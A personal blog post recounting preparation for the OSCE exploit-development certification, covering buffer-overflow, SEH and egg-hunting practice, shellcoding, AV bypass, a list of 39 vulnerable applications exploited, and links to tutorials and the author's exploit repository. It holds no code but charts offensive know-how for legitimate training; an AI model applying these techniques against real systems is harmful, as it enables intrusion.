My OSCE Experience

Hi guys,
After OSCP and OSWP, I finally got my OSCE certification also. I’m continuing with my personal plan to complete all Offsec certs and just got another beast! As always, I wanted to share my experience and personal studies for OSCE.
Status Before OSCE:ย I was capable of exploiting Basic Buffer overflows and had a solid understanding of Memory.

Status After OSCE:ย I learned many complex techniques and able to write my own exploits from scratch.

** I was trying to understand how to exploit a basic buffer overflow during OSCP prep and spend hours to exploit Minishare. After OSCE, I was able to write a script for Minishare in 4 minutes. I think this explains everything ๐Ÿ˜€
Before the Lab/Self Prep:

  • I read as many blog posts & paths as I can for OSCE and created my own path as always.
    Finished the SLAE course to refresh my understanding of Assembly. That course is outstanding.
  • I read and wrote exploits from the exploit dev topics of Corelan and FuzzySecurity blogs. They are super cool. These blogs helped me a lot.
  • I learned how to do fuzzing with different scripts (spike, boofuzz, custom scripts)
  • I wrote many many many exploits on SEH, Egg hunting. You can check out my Github page to understand what I meant by many ๐Ÿ™‚
  • I read other people’s exploits on ExploitDB and blogposts. I realized that in time, I had my own style for writing exploits.
  • I started working on AV Bypass. I was working on AV Bypass 3 times per week while writing exploits the other 4 days.
  • I learned different techniques such as Socket Reuse, Custom Shellcode writing, Alphanumeric Shellcoding (killed me for days, now I can do it even in my dreams)ย 
  • I worked on my assembly knowledge specifically.ย 
  • Fell in love with Immunity Debugger ๐Ÿ˜€

I had a very demanding consultancy job at the same time so had a schedule for self-study as follows:

  • Coming home from work:ย 19.00-19.30
  • Self Study:ย 20.00- 24.00
  • Self Study2:ย 04.00-07.00
  • Go to work:ย 08.00

Human Time:ย ???!
Believe me, doing this for 4 consecutive months was pretty crazy. But is there anything more beautiful than hacking at night? ๐Ÿ˜€
– And the last but not the least, during my preparation, I wrote exploits for the following applications:

  1. BigAnt Server 2.52 SP5
  2. BlazeDVD 5 Professional
  3. Cesar FTP 0.9.9g
  4. Dup Scout Enterprise 10.0.18
  5. DVD X Player 5.5
  6. Easy CD DVD Copy v1.3.24
  7. Easy File Management Web Server 5.3 – 
  8. Easy File Sharing FTP Server 3.5
  9. Easy File Sharing Web Server 7.2
  10. Easy RM to MP3 Converter 2.7.3.7
  11. Easy_Chat_Server_3.1
  12. EurekaEmailClient2.2
  13. FreeFloat FTP
  14. FreeFTP 1.0.8
  15. HP NNM 7.53
  16. KarjaSoft_Sami_FTP_Server_2.0.1
  17. KnFTP_Server_1.0.0
  18. Kolibri v2.0 HTTP Server
  19. LabF nfsAxe FTP Client 3.7
  20. Millenium MP3 Studio1.0
  21. MinaliC WebServer 2.0.0 
  22. Minishare 1.4.1 
  23. ProSysInfo TFTP Server TFTPDWIN 0.4.2 
  24. Quick Zip v4.60.019
  25. R v3.4.4
  26. Ricoh DC Software DL-10 FTP Server
  27. Savant Web Server 3.1
  28. Serv-U 9.0.0.5
  29. Solar FTP Server 2.1.1
  30. Soritong MP3 Player 1.0
  31. Spipe (McAfee HTTP Server (NAISERV.exe))
  32. SysGauge Pro v4.6.12
  33. Vulnserver GMON
  34. Vulnserver HTER
  35. Vulnserver KSTET
  36. Vulnserver LTER
  37. Vulnserver TRUN
  38. Xitami Webserver 2.5
  39. zipper

I shared most of them on my Github page already. Then I think I was ready for the lab ๐Ÿ˜€
Lab:– I already do web pentest with my freelance job all the time so the web section was not a problem for me. – After my pre-lab, I was already familiar with SEH, Egghunting, ASLR Bypass. I refreshed my knowledge in the lab- AV bypass was pretty straightforward. I did my pre-study very well apparently- I solved all sections in the lab 4 times during my lab time.
Exam:I’m sorry but I won’t write anything lovely in this section. The exam was brutal. You need to be really familiar with everything and have many practices. I checked my sanity a couple of times during the exam. I  finished the exam on the second day.

Conclusion:After OSCE, I realized that I’ve born to do binary exploitation. I’m really into it now and I don’t think that I will ever be able to stop. Before jumping into OSWE, I created a roadmap for myself to continue on binary exploitation nonstop already. So thanks Offsec guys one more time to help me find my way with TryHarder philosophy. You guys are amazing!
Hope this helps people who prepare for OSCE and stay tuned for the next blogpost for OSWE ๐Ÿ™‚ In the meantime, I’ll dive into reverse engineering world ๐Ÿ˜€
Cheers!

Busraย 

References:

Automated fuzzing: (Spike)

https://theitgeekchronicles.files.wordpress.com/2012/05/scapyguide1.pdfhttps://resources.infosecinstitute.com/intro-to-fuzzing/

Assembly and Shellcode basics:

Security Tube Linux Assembly Expert (32 bit) course

SEH

https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows

https://fuzzysecurity.com/tutorials/expDev/1.html

Egghunting

https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

https://fuzzysecurity.com/tutorials/expDev/1.html

AV Bypass

https://captmeelo.com/exploitdev/osceprep/2018/07/21/backdoor101-part2.html

https://haiderm.com/fully-undetectable-backdooring-pe-file/

My Scripts:
https://github.com/areyou1or0/OSCE-Exploit-Development

Leave a comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.